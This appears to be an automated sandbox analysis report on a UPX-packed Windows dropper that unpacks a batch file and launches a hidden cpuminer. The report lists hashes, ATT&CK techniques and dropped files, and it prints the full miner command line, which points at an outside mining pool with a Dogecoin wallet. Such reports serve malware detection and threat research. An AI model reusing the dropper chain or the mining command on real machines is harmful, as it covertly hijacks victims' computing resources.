73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
11/02/2024, 13:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
5076	b2e.exe
32	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
32	cpuminer-sse2.exe
32	cpuminer-sse2.exe
32	cpuminer-sse2.exe
32	cpuminer-sse2.exe
32	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1652-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 5076	1652	batexe.exe	85
PID 1652 wrote to memory of 5076	1652	batexe.exe	85
PID 1652 wrote to memory of 5076	1652	batexe.exe	85
PID 5076 wrote to memory of 936	5076	b2e.exe	86
PID 5076 wrote to memory of 936	5076	b2e.exe	86
PID 5076 wrote to memory of 936	5076	b2e.exe	86
PID 936 wrote to memory of 32	936	cmd.exe	89
PID 936 wrote to memory of 32	936	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\77A1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:936
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:32

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe

Filesize
18.6MB

MD5
3e6105de1c5d24ca4bbf1dc2f2f5aa4a

SHA1
8289afcd3a898deb587c0326ceb108c3d24a35c6

SHA256
e953138d48b46aa8e0983398b2d88a3f48c50f3bedd689ee79532e8f2fe90e79

SHA512
d9995ce2cb1accec27294b4898a0e33871e057ebf703dc784ed318909d0ca189e72eb41d1a1c5aa1c2ea1c0f9d47cee34e350fb3104845e7724961cf21ae70e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe

Filesize
16.9MB

MD5
0ba818adbf4c3575ce84e0ac4f318b87

SHA1
15b043d60d5ecf08e8031e93d39773f2d20ac841

SHA256
51dc3943e44cb5aeaaf39538701b3f05196e9279a44f6ec1425ec939e4f23baa

SHA512
b4bf13f670494d15930157e2a35d01332bed952c4abdd184386386dcc09585e2c0e3bf0f87c4d0d3a8499be69f075dbc9529d3debc798de4069fb6a9b3330aa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe

Filesize
15.5MB

MD5
0c8ac0a6045fcc0fe644670e33bdd7fe

SHA1
efbf78d23cce8bd1b5a090b493c8b5c3e25fecaf

SHA256
75b3a1e8dbd50081823980dd7090148e78fbc2aef61153d171c372c7766aa5da

SHA512
d6dad64f697a7b18985da1450f3347dec1090ba2900a23e45f34d5a4a7abddd175c10d9f3ed96fbefa604630a178683de0e2855bc4253ccc16f8d30c60ed107f

Download Submit
C:\Users\Admin\AppData\Local\Temp\77A1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
704KB

MD5
ce5f200d2d48a057722a957d5acc6426

SHA1
e7a8d4c0dc7b561dfa26e3fddaff015716187305

SHA256
cb450c8c0a952560f35f4b93f14357fc3856ee0b016eabf8bb4d20e9504d82df

SHA512
e7d3b203cc96d08b6d000f6845bbeb5777cd08babadbcb86266193ca68d8183973b3a92f5cf587df1f26bf04a182fa51001b7317c9a9e7ba868d1e26b897ee9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
256KB

MD5
11e8812bfa1d698cdeb73a16c1d7c963

SHA1
e8708fd452ab5946b380d0c353ac26acf289e548

SHA256
e0f9ddf8afd30511763f0cf792369e32c955f15d9529c00c5fe9298a80d74402

SHA512
fd54c9c6f3520b2ced6b42235ebfce6d8b622c53f1fbf810baace657a7d44430968b5ff90cd1d860dbdf7550dd8cd467636c862ff0dd0832f25145efccc7731e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
320KB

MD5
c911df8bf8c66277e14360319b0b93b7

SHA1
598c59c0e7cbecb788ee676db218dc0faaa39bdc

SHA256
4c53941f04ddeae2179047a1c7f8c7f7f46af0f08c424ab66d61f2316f2ee77d

SHA512
13aeae87ee52f22d1c928c99c66e116254cde630c09f90b146962fa61276af13fef653b7a66184d00d614f0379750e641c2e62326ebb5588ca632e56c935d77c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
256KB

MD5
f8edb8dd2fb15f1887ace09587589dd4

SHA1
cbf7cbfefc0215d9500a98d9064deb9e86787152

SHA256
0465270288d69a0ec9beb7114707bed76756c14148293237d0d35423abdfc67b

SHA512
aa993112953225280c0bedb1ebd8288298b9c22a6a884a952ba60e48cbd21c4ce60724b7adc961a0528d7c569596e3420fec2670fc47c3eb6c00c691e0378abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
320KB

MD5
e63bf5df87e2ea807dc353cc5aa9aab1

SHA1
69fc94bbebe878711cb133c3a1affb80c0bdecff

SHA256
2c9d6315f90367b959d3c32badd99bbc03eb808e4a46db72ccf2e81788b41533

SHA512
70f2b2a8a4c8ab23d81266cd23b75c27ced29a1eab8c80d95c57b595b10254b7229cc03b637716edbfad2a83827f2c557847b98d1de80256beec05c9512ee4bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
256KB

MD5
1d86b9560854472453237bcbaa2e253f

SHA1
5a03a7902d250377a3e9f746badcb696e2c98228

SHA256
1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d

SHA512
afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
320KB

MD5
1ae43cc09627ff82d15527ea2693fd76

SHA1
c39ffa1a4b80c29fa1f5caed3e7d091253266c66

SHA256
b63980c9d592a6d0d8521f74bd4c6f7cc4ae5f8c3320d2bd63764c56648ac45f

SHA512
21945e4e2fad3ee2b2a19d19bbbc1ada832c33a0d3bf499d6ac8f093b39021323ea0f7df3d54167a3456cbaf01ff126a6e6abbe17dd4eb8d5a24ca000888c271

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
memory/32-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/32-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/32-46-0x000000005BE40000-0x000000005BED8000-memory.dmp

Filesize
608KB

Download
memory/32-47-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/32-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/32-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1652-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5076-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5076-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download